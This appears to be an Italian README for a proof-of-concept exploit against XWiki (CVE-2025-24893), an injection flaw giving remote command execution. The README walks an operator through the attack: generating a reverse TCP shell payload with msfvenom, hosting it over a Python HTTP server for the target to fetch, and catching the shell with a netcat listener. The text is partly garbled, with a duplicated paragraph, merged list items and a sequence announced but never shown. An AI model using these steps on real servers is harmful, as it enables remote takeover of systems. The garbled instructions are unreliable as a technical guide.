
Il PoC sfrutta CVE-2025-24893, una vulnerabilità di esecuzione di codice remoto (RCE) in XWiki causata da un sandboxing improprio nelle macro Groovy renderizzate in modo asincrono. Consente l'esecuzione arbitraria di comandi tramite injection negli endpoint SolrSearch basati su RSS.
Questo script Python sfrutta CVE-2025-24893, una vulnerabilità di esecuzione remota di codice (RCE) in XWiki causata da un sandboxing improprio nelle macro Groovy renderizzate in modo asincrono. Consente l'esecuzione arbitraria di comandi tramite l'iniezione negli endpoint SolrSearch basati su RSS.
msfvenom)Clona o scarica lo script.
Assicurati di avere installato quanto segue:
msfvenom di Metasploitjq (usato nei payload bash)Esegui lo script:
python3 CVE-2025-24893-PoC.py
Seleziona dal menu:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
Lo script invia la seguente sequenza al target:
Questo strumento è destinato esclusivamente a scopo educativo e a test autorizzati. L'uso non autorizzato su sistemi di cui non si è proprietari o per i quali non si ha esplicito permesso di test è illegale e non etico.